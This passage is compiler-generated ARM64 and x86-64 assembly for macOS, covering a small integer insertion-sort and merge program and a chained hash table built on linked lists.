[sp, #44] add x8, sp, #72 ldr w9, [x8, x9, lsl #2] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB0_60 LBB0_60: ; in Loop: Header=BB0_58 Depth=1 ldr w8, [sp, #44] add w8, w8, #1 str w8, [sp, #44] b LBB0_58 LBB0_61: ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_63 b LBB0_62 LBB0_62: bl ___stack_chk_fail LBB0_63: mov w0, #0 ldp x29, x30, [sp, #192] ; 16-byte Folded Reload add sp, sp, #208 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d" l_.str.1: ; @.str.1 .asciz "\n" l_.str.2: ; @.str.2 .asciz "[%d]" l_.str.3: ; @.str.3 .asciz "\n\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $192, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -148(%rbp) movl $0, -156(%rbp) movl $0, -160(%rbp) movl $0, -164(%rbp) leaq L_.str(%rip), %rdi leaq -152(%rbp), %rsi movb $0, %al callq _scanf LBB0_1: ## =>This Loop Header: Depth=1 ## Child Loop BB0_5 Depth 2 ## Child Loop BB0_10 Depth 2 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $7, -156(%rbp) movb %al, -177(%rbp) ## 1-byte Spill jge LBB0_3 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 cmpl $0, -152(%rbp) setg %al movb %al, -177(%rbp) ## 1-byte Spill LBB0_3: ## in Loop: Header=BB0_1 Depth=1 movb -177(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB0_4 jmp LBB0_16 LBB0_4: ## in Loop: Header=BB0_1 Depth=1 movl $0, -168(%rbp) LBB0_5: ## Parent Loop BB0_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -168(%rbp), %ecx xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl -156(%rbp), %ecx movb %al, -178(%rbp) ## 1-byte Spill jge LBB0_7 ## %bb.6: ## in Loop: Header=BB0_5 Depth=2 movl -152(%rbp), %eax movslq -168(%rbp), %rcx cmpl -48(%rbp,%rcx,4), %eax setg %al movb %al, -178(%rbp) ## 1-byte Spill LBB0_7: ## in Loop: Header=BB0_5 Depth=2 movb -178(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB0_8 jmp LBB0_9 LBB0_8: ## in Loop: Header=BB0_5 Depth=2 movl -168(%rbp), %eax addl $1, %eax movl %eax, -168(%rbp) jmp LBB0_5 LBB0_9: ## in Loop: Header=BB0_1 Depth=1 movl -156(%rbp), %eax movl %eax, -172(%rbp) LBB0_10: ## Parent Loop BB0_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -172(%rbp), %eax cmpl -168(%rbp), %eax jle LBB0_13 ## %bb.11: ## in Loop: Header=BB0_10 Depth=2 movl -172(%rbp), %eax subl $1, %eax cltq movl -48(%rbp,%rax,4), %ecx movslq -172(%rbp), %rax movl %ecx, -48(%rbp,%rax,4) ## %bb.12: ## in Loop: Header=BB0_10 Depth=2 movl -172(%rbp), %eax addl $-1, %eax movl %eax, -172(%rbp) jmp LBB0_10 LBB0_13: ## in Loop: Header=BB0_1 Depth=1 movl -152(%rbp), %ecx movslq -168(%rbp), %rax movl %ecx, -48(%rbp,%rax,4) movl -156(%rbp), %eax addl $1, %eax movl %eax, -156(%rbp) cmpl $7, -156(%rbp) jge LBB0_15 ## %bb.14: ## in Loop: Header=BB0_1 Depth=1 leaq L_.str(%rip), %rdi leaq -152(%rbp), %rsi movb $0, %al callq _scanf LBB0_15: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_1 LBB0_16: leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf movl $0, -172(%rbp) LBB0_17: ## =>This Inner Loop Header: Depth=1 movl -172(%rbp), %eax cmpl -156(%rbp), %eax jge LBB0_20 ## %bb.18: ## in Loop: Header=BB0_17 Depth=1 movslq -172(%rbp), %rax movl -48(%rbp,%rax,4), %esi leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf ## %bb.19: ## in Loop: Header=BB0_17 Depth=1 movl -172(%rbp), %eax addl $1, %eax movl %eax, -172(%rbp) jmp LBB0_17 LBB0_20: leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf leaq L_.str(%rip), %rdi leaq -152(%rbp), %rsi movb $0, %al callq _scanf LBB0_21: ## =>This Loop Header: Depth=1 ## Child Loop BB0_25 Depth 2 ## Child Loop BB0_30 Depth 2 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $7, -160(%rbp) movb %al, -179(%rbp) ## 1-byte Spill jge LBB0_23 ## %bb.22: ## in Loop: Header=BB0_21 Depth=1 cmpl $0, -152(%rbp) setg %al movb %al, -179(%rbp) ## 1-byte Spill LBB0_23: ## in Loop: Header=BB0_21 Depth=1 movb -179(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB0_24 jmp LBB0_36 LBB0_24: ## in Loop: Header=BB0_21 Depth=1 movl $0, -168(%rbp) LBB0_25: ## Parent Loop BB0_21 Depth=1 ## => This Inner Loop Header: Depth=2 movl -168(%rbp), %ecx xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl -160(%rbp), %ecx movb %al, -180(%rbp) ## 1-byte Spill jge LBB0_27 ## %bb.26: ## in Loop: Header=BB0_25 Depth=2 movl -152(%rbp), %eax movslq -168(%rbp), %rcx cmpl -80(%rbp,%rcx,4), %eax setg %al movb %al, -180(%rbp) ## 1-byte Spill LBB0_27: ## in Loop: Header=BB0_25 Depth=2 movb -180(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB0_28 jmp LBB0_29 LBB0_28: ## in Loop: Header=BB0_25 Depth=2 movl -168(%rbp), %eax addl $1, %eax movl %eax, -168(%rbp) jmp LBB0_25 LBB0_29: ## in Loop: Header=BB0_21 Depth=1 movl -160(%rbp), %eax movl %eax, -172(%rbp) LBB0_30: ## Parent Loop BB0_21 Depth=1 ## => This Inner Loop Header: Depth=2 movl -172(%rbp), %eax cmpl -168(%rbp), %eax jle LBB0_33 ## %bb.31: ## in Loop: Header=BB0_30 Depth=2 movl -172(%rbp), %eax subl $1, %eax cltq movl -80(%rbp,%rax,4), %ecx movslq -172(%rbp), %rax movl %ecx, -80(%rbp,%rax,4) ## %bb.32: ## in Loop: Header=BB0_30 Depth=2 movl -172(%rbp), %eax addl $-1, %eax movl %eax, -172(%rbp) jmp LBB0_30 LBB0_33: ## in Loop: Header=BB0_21 Depth=1 movl -152(%rbp), %ecx movslq -168(%rbp), %rax movl %ecx, -80(%rbp,%rax,4) movl -160(%rbp), %eax addl $1, %eax movl %eax, -160(%rbp) cmpl $7, -160(%rbp) jge LBB0_35 ## %bb.34: ## in Loop: Header=BB0_21 Depth=1 leaq L_.str(%rip), %rdi leaq -152(%rbp), %rsi movb $0, %al callq _scanf LBB0_35: ## in Loop: Header=BB0_21 Depth=1 jmp LBB0_21 LBB0_36: leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf movl $0, -172(%rbp) LBB0_37: ## =>This Inner Loop Header: Depth=1 movl -172(%rbp), %eax cmpl -160(%rbp), %eax jge LBB0_40 ## %bb.38: ## in Loop: Header=BB0_37 Depth=1 movslq -172(%rbp), %rax movl -80(%rbp,%rax,4), %esi leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf ## %bb.39: ## in Loop: Header=BB0_37 Depth=1 movl -172(%rbp), %eax addl $1, %eax movl %eax, -172(%rbp) jmp LBB0_37 LBB0_40: movl $0, -172(%rbp) LBB0_41: ## =>This Inner Loop Header: Depth=1 movl -172(%rbp), %eax cmpl -156(%rbp), %eax jge LBB0_44 ## %bb.42: ## in Loop: Header=BB0_41 Depth=1 movslq -172(%rbp), %rax movl -48(%rbp,%rax,4), %ecx movslq -172(%rbp), %rax movl %ecx, -144(%rbp,%rax,4) movl -164(%rbp), %eax addl $1, %eax movl %eax, -164(%rbp) ## %bb.43: ## in Loop: Header=BB0_41 Depth=1 movl -172(%rbp), %eax addl $1, %eax movl %eax, -172(%rbp) jmp LBB0_41 LBB0_44: leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf movl $0, -176(%rbp) LBB0_45: ## =>This Loop Header: Depth=1 ## Child Loop BB0_47 Depth 2 ## Child Loop BB0_52 Depth 2 movl -176(%rbp), %eax cmpl -160(%rbp), %eax jge LBB0_57 ## %bb.46: ## in Loop: Header=BB0_45 Depth=1 movl $0, -168(%rbp) LBB0_47: ## Parent Loop BB0_45 Depth=1 ## => This Inner Loop Header: Depth=2 movl -168(%rbp), %ecx xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl -164(%rbp), %ecx movb %al, -181(%rbp) ## 1-byte Spill jge LBB0_49 ## %bb.48: ## in Loop: Header=BB0_47 Depth=2 movslq -176(%rbp), %rax movl -80(%rbp,%rax,4), %eax movslq -168(%rbp), %rcx cmpl -144(%rbp,%rcx,4), %eax setg %al movb %al, -181(%rbp) ## 1-byte Spill LBB0_49: ## in Loop: Header=BB0_47 Depth=2 movb -181(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB0_50 jmp LBB0_51 LBB0_50: ## in Loop: Header=BB0_47 Depth=2 movl -168(%rbp), %eax addl $1, %eax movl %eax, -168(%rbp) jmp LBB0_47 LBB0_51: ## in Loop: Header=BB0_45 Depth=1 movl -164(%rbp), %eax movl %eax, -172(%rbp) LBB0_52: ## Parent Loop BB0_45 Depth=1 ## => This Inner Loop Header: Depth=2 movl -172(%rbp), %eax cmpl -168(%rbp), %eax jle LBB0_55 ## %bb.53: ## in Loop: Header=BB0_52 Depth=2 movl -172(%rbp), %eax subl $1, %eax cltq movl -144(%rbp,%rax,4), %ecx movslq -172(%rbp), %rax movl %ecx, -144(%rbp,%rax,4) ## %bb.54: ## in Loop: Header=BB0_52 Depth=2 movl -172(%rbp), %eax addl $-1, %eax movl %eax, -172(%rbp) jmp LBB0_52 LBB0_55: ## in Loop: Header=BB0_45 Depth=1 movslq -176(%rbp), %rax movl -80(%rbp,%rax,4), %ecx movslq -168(%rbp), %rax movl %ecx, -144(%rbp,%rax,4) movl -164(%rbp), %eax addl $1, %eax movl %eax, -164(%rbp) ## %bb.56: ## in Loop: Header=BB0_45 Depth=1 movl -176(%rbp), %eax addl $1, %eax movl %eax, -176(%rbp) jmp LBB0_45 LBB0_57: movl $0, -172(%rbp) LBB0_58: ## =>This Inner Loop Header: Depth=1 movl -172(%rbp), %eax cmpl -164(%rbp), %eax jge LBB0_61 ## %bb.59: ## in Loop: Header=BB0_58 Depth=1 movslq -172(%rbp), %rax movl -144(%rbp,%rax,4), %esi leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf ## %bb.60: ## in Loop: Header=BB0_58 Depth=1 movl -172(%rbp), %eax addl $1, %eax movl %eax, -172(%rbp) jmp LBB0_58 LBB0_61: movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_63 ## %bb.62: xorl %eax, %eax addq $192, %rsp popq %rbp retq LBB0_63: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d" L_.str.1: ## @.str.1 .asciz "\n" L_.str.2: ## @.str.2 .asciz "[%d]" L_.str.3: ## @.str.3 .asciz "\n\n" .subsections_via_symbols
the_stack_data/111078345.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _node_new ; -- Begin function node_new .p2align 2 _node_new: ; @node_new .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] mov x0, #24 bl _malloc stur x0, [x29, #-16] ldur x8, [x29, #-16] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: ldur x9, [x29, #-16] str xzr, [sp, #8] str xzr, [sp, #16] str xzr, [sp, #24] ldur w8, [x29, #-4] str w8, [sp, #8] ldur q0, [sp, #8] str q0, [x9] ldr x8, [sp, #24] str x8, [x9, #16] b LBB0_2 LBB0_2: ldur x0, [x29, #-16] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .globl _node_delete ; -- Begin function node_delete .p2align 2 _node_delete: ; @node_delete .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #8] ldr x8, [sp, #8] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB1_2 b LBB1_1 LBB1_1: ldr x0, [sp, #8] bl _free b LBB1_2 LBB1_2: ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _list_new ; -- Begin function list_new .p2align 2 _list_new: ; @list_new .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov x0, #8 bl _malloc str x0, [sp, #8] ldr x8, [sp, #8] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB2_2 b LBB2_1 LBB2_1: ldr x9, [sp, #8] ; kill: def $x8 killed $xzr str xzr, [sp] ldr x8, [sp] str x8, [x9] b LBB2_2 LBB2_2: ldr x0, [sp, #8] ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _list_delete ; -- Begin function list_delete .p2align 2 _list_delete: ; @list_delete .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] ldur x8, [x29, #-8] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB3_5 b LBB3_1 LBB3_1: ldur x8, [x29, #-8] ldr x8, [x8] str x8, [sp, #16] b LBB3_2 LBB3_2: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #16] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB3_4 b LBB3_3 LBB3_3: ; in Loop: Header=BB3_2 Depth=1 ldr x8, [sp, #16] ldr x8, [x8, #16] str x8, [sp, #8] ldr x0, [sp, #16] bl _free ldr x8, [sp, #8] str x8, [sp, #16] b LBB3_2 LBB3_4: ldur x0, [x29, #-8] bl _free b LBB3_5 LBB3_5: ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _list_search ; -- Begin function list_search .p2align 2 _list_search: ; @list_search .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 str x0, [sp, #24] str w1, [sp, #20] ldr x8, [sp, #24] ldr x8, [x8] str x8, [sp, #8] b LBB4_1 LBB4_1: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #8] subs x8, x8, #0 cset w8, eq mov w9, #0 str w9, [sp, #4] ; 4-byte Folded Spill tbnz w8, #0, LBB4_3 b LBB4_2 LBB4_2: ; in Loop: Header=BB4_1 Depth=1 ldr x8, [sp, #8] ldr w8, [x8] ldr w9, [sp, #20] subs w8, w8, w9 cset w8, ne str w8, [sp, #4] ; 4-byte Folded Spill b LBB4_3 LBB4_3: ; in Loop: Header=BB4_1 Depth=1 ldr w8, [sp, #4] ; 4-byte Folded Reload tbz w8, #0, LBB4_5 b LBB4_4 LBB4_4: ; in Loop: Header=BB4_1 Depth=1 ldr x8, [sp, #8] ldr x8, [x8, #16] str x8, [sp, #8] b LBB4_1 LBB4_5: ldr x0, [sp, #8] add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _list_insert ; -- Begin function list_insert .p2align 2 _list_insert: ; @list_insert .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str x0, [sp, #8] str x1, [sp] ldr x8, [sp, #8] ldr x8, [x8] ldr x9, [sp] str x8, [x9, #16] ldr x8, [sp, #8] ldr x8, [x8] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB5_2 b LBB5_1 LBB5_1: ldr x8, [sp] ldr x9, [sp, #8] ldr x9, [x9] str x8, [x9, #8] b LBB5_2 LBB5_2: ldr x8, [sp] ldr x9, [sp, #8] str x8, [x9] ldr x8, [sp] ; kill: def $x9 killed $xzr str xzr, [x8, #8] add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _list_delete_ ; -- Begin function list_delete_ .p2align 2 _list_delete_: ; @list_delete_ .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str x0, [sp, #8] str x1, [sp] ldr x8, [sp] ldr x8, [x8, #8] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB6_2 b LBB6_1 LBB6_1: ldr x8, [sp] ldr x8, [x8, #16] ldr x9, [sp] ldr x9, [x9, #8] str x8, [x9, #16] b LBB6_3 LBB6_2: ldr x8, [sp] ldr x8, [x8, #16] ldr x9, [sp, #8] str x8, [x9] b LBB6_3 LBB6_3: ldr x8, [sp] ldr x8, [x8, #16] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB6_5 b LBB6_4 LBB6_4: ldr x8, [sp] ldr x8, [x8, #8] ldr x9, [sp] ldr x9, [x9, #16] str x8, [x9, #8] b LBB6_5 LBB6_5: add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _h ; -- Begin function h .p2align 2 _h: ; @h .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str w0, [sp, #12] ldr w8, [sp, #12] mov w10, #9 sdiv w9, w8, w10 mul w9, w9, w10 subs w0, w8, w9 add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _chained_hash_insert ; -- Begin function chained_hash_insert .p2align 2 _chained_hash_insert: ; @chained_hash_insert .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] str x1, [sp, #16] str x2, [sp, #8] ldr x8, [sp, #16] str x8, [sp] ; 8-byte Folded Spill ldr x8, [sp, #8] ldr w0, [x8] bl _h ldr x8, [sp] ; 8-byte Folded Reload ldr x1, [sp, #8] add x0, x8, w0, sxtw #3 bl _list_insert ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _chained_hash_search ; -- Begin function chained_hash_search .p2align 2 _chained_hash_search: ; @chained_hash_search .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] str x1, [sp, #16] str w2, [sp, #12] ldr x8, [sp, #16] str x8, [sp] ; 8-byte Folded Spill ldr w0, [sp, #12] bl _h ldr x8, [sp] ; 8-byte Folded Reload ldr w1, [sp, #12] add x0, x8, w0, sxtw #3 bl _list_search ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _chained_hash_delete ; -- Begin function chained_hash_delete .p2align 2 _chained_hash_delete: ; @chained_hash_delete .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] str x1, [sp, #16] str x2, [sp, #8] ldr x8, [sp, #16] str x8, [sp] ; 8-byte Folded Spill ldr x8, [sp, #8] ldr w0, [x8] bl _h ldr x8, [sp] ; 8-byte Folded Reload ldr x1, [sp, #8] add x0, x8, w0, sxtw #3 bl _list_delete_ ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _print_chained_hash ; -- Begin function print_chained_hash .p2align 2 _print_chained_hash: ; @print_chained_hash .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur x1, [x29, #-16] adrp x8, l___const.print_chained_hash.tails@PAGE add x8, x8, l___const.print_chained_hash.tails@PAGEOFF ldrh w9, [x8] sturh w9, [x29, #-20] ldrb w8, [x8, #2] sturb w8, [x29, #-18] adrp x8, l___const.print_chained_hash.tails2@PAGE add x8, x8, l___const.print_chained_hash.tails2@PAGEOFF ldrh w9, [x8] sturh w9, [x29, #-24] ldrb w8, [x8, #2] sturb w8, [x29, #-22] str xzr, [sp, #32] b LBB11_1 LBB11_1: ; =>This Loop Header: Depth=1 ; Child Loop BB11_3 Depth 2 ldr x8, [sp, #32] ldur x9, [x29, #-8] subs x8, x8, x9 cset w8, hs tbnz w8, #0, LBB11_7 b LBB11_2 LBB11_2: ; in Loop: Header=BB11_1 Depth=1 ldur x8, [x29, #-16] ldr x9, [sp, #32] add x8, x8, x9, lsl #3 str x8, [sp, #24] ldr x8, [sp, #24] ldr x8, [x8] str x8, [sp, #16] ldr x8, [sp, #32] ldr x9, [sp, #16] subs x9, x9, #0 cset w10, eq ; implicit-def: $x9 mov x9, x10 and x10, x9, #0x1 sub x9, x29, #24 ldrsb w10, [x9, x10] mov x9, sp str x8, [x9] ; implicit-def: $x8 mov x8, x10 str x8, [x9, #8] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf b LBB11_3 LBB11_3: ; Parent Loop BB11_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr x8, [sp, #16] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB11_5 b LBB11_4 LBB11_4: ; in Loop: Header=BB11_3 Depth=2 ldr x8, [sp, #16] ldr w9, [x8] ; implicit-def: $x8 mov x8, x9 ldr x9, [sp, #16] ldr x9, [x9, #16] subs x9, x9, #0 cset w10, eq ; implicit-def: $x9 mov x9, x10 and x10, x9, #0x1 sub x9, x29, #20 ldrsb w10, [x9, x10] mov x9, sp str x8, [x9] ; implicit-def: $x8 mov x8, x10 str x8, [x9, #8] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf ldr x8, [sp, #16] ldr x8, [x8, #16] str x8, [sp, #16] b LBB11_3 LBB11_5: ; in Loop: Header=BB11_1 Depth=1 b LBB11_6 LBB11_6: ; in Loop: Header=BB11_1 Depth=1 ldr x8, [sp, #32] add x8, x8, #1 str x8, [sp, #32] b LBB11_1 LBB11_7: ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #368 .cfi_def_cfa_offset 368 stp x28, x27, [sp, #336] ; 16-byte Folded Spill stp x29, x30, [sp, #352] ; 16-byte Folded Spill add x29, sp, #352 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] mov w8, #0 str w8, [sp, #12] ; 4-byte Folded Spill str wzr, [sp, #36] str w0, [sp, #32] str x1, [sp, #24] add x0, sp, #112 adrp x1, l___const.main.keys@PAGE add x1, x1, l___const.main.keys@PAGEOFF mov x2, #216 bl _memcpy ldr w1, [sp, #12] ; 4-byte Folded Reload add x0, sp, #40 mov x2, #72 bl _memset str xzr, [sp, #16] b LBB12_1 LBB12_1: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #16] subs x8, x8, #9 cset w8, hs tbnz w8, #0, LBB12_4 b LBB12_2 LBB12_2: ; in Loop: Header=BB12_1 Depth=1 ldr x8, [sp, #16] mov x9, #24 mul x9, x8, x9 add x8, sp, #112 add x2, x8, x9 mov x0, #9 add x1, sp, #40 bl _chained_hash_insert b LBB12_3 LBB12_3: ; in Loop: Header=BB12_1 Depth=1 ldr x8, [sp, #16] add x8, x8, #1 str x8, [sp, #16] b LBB12_1 LBB12_4: mov x0, #9 add x1, sp, #40 bl _print_chained_hash ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB12_6 b LBB12_5 LBB12_5: bl ___stack_chk_fail LBB12_6: mov w0, #0 ldp x29, x30, [sp, #352] ; 16-byte Folded Reload ldp x28, x27, [sp, #336] ; 16-byte Folded Reload add sp, sp, #368 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l___const.print_chained_hash.tails: ; @__const.print_chained_hash.tails .asciz ",\n" l___const.print_chained_hash.tails2: ; @__const.print_chained_hash.tails2 .asciz " \n" l_.str: ; @.str .asciz "%zu:%c" l_.str.1: ; @.str.1 .asciz "%d%c" .section __TEXT,__const .p2align 3 ; @__const.main.keys l___const.main.keys: .long 5 ; 0x5 .space 4 .quad 0 .quad 0 .long 28 ; 0x1c .space 4 .quad 0 .quad 0 .long 19 ; 0x13 .space 4 .quad 0 .quad 0 .long 15 ; 0xf .space 4 .quad 0 .quad 0 .long 20 ; 0x14 .space 4 .quad 0 .quad 0 .long 33 ; 0x21 .space 4 .quad 0 .quad 0 .long 12 ; 0xc .space 4 .quad 0 .quad 0 .long 17 ; 0x11 .space 4 .quad 0 .quad 0 .long 10 ; 0xa .space 4 .quad 0 .quad 0 .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _node_new ## -- Begin function node_new .p2align 4, 0x90 _node_new: ## @node_new .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movl %edi, -4(%rbp) movl $24, %edi callq _malloc movq %rax, -16(%rbp) cmpq $0, -16(%rbp) je LBB0_2 ## %bb.1: movq -16(%rbp), %rax movq %rax, -48(%rbp) ## 8-byte Spill leaq -40(%rbp), %rdi xorl %esi, %esi movl $24, %edx callq _memset movq -48(%rbp), %rax ## 8-byte Reload movl -4(%rbp), %ecx movl %ecx, -40(%rbp) movq -40(%rbp), %rcx movq %rcx, (%rax) movq -32(%rbp), %rcx movq %rcx, 8(%rax) movq -24(%rbp), %rcx movq %rcx, 16(%rax) LBB0_2: movq -16(%rbp), %rax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _node_delete ## -- Begin function node_delete .p2align 4, 0x90 _node_delete: ## @node_delete .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) cmpq $0, -8(%rbp) je LBB1_2 ## %bb.1: movq -8(%rbp), %rdi callq _free LBB1_2: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _list_new ## -- Begin function list_new .p2align 4, 0x90 _list_new: ## @list_new .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $8, %edi callq _malloc movq %rax, -8(%rbp) cmpq $0, -8(%rbp) je LBB2_2 ## %bb.1: movq -8(%rbp), %rax movq $0, -16(%rbp) movq -16(%rbp), %rcx movq %rcx, (%rax) LBB2_2: movq -8(%rbp), %rax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _list_delete ## -- Begin function list_delete .p2align 4, 0x90 _list_delete: ## @list_delete .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq %rdi, -8(%rbp) cmpq $0, -8(%rbp) je LBB3_5 ## %bb.1: movq -8(%rbp), %rax movq (%rax), %rax movq %rax, -16(%rbp) LBB3_2: ## =>This Inner Loop Header: Depth=1 cmpq $0, -16(%rbp) je LBB3_4 ## %bb.3: ## in Loop: Header=BB3_2 Depth=1 movq -16(%rbp), %rax movq 16(%rax), %rax movq %rax, -24(%rbp) movq -16(%rbp), %rdi callq _free movq -24(%rbp), %rax movq %rax, -16(%rbp) jmp LBB3_2 LBB3_4: movq -8(%rbp), %rdi callq _free LBB3_5: addq $32, %rsp popq 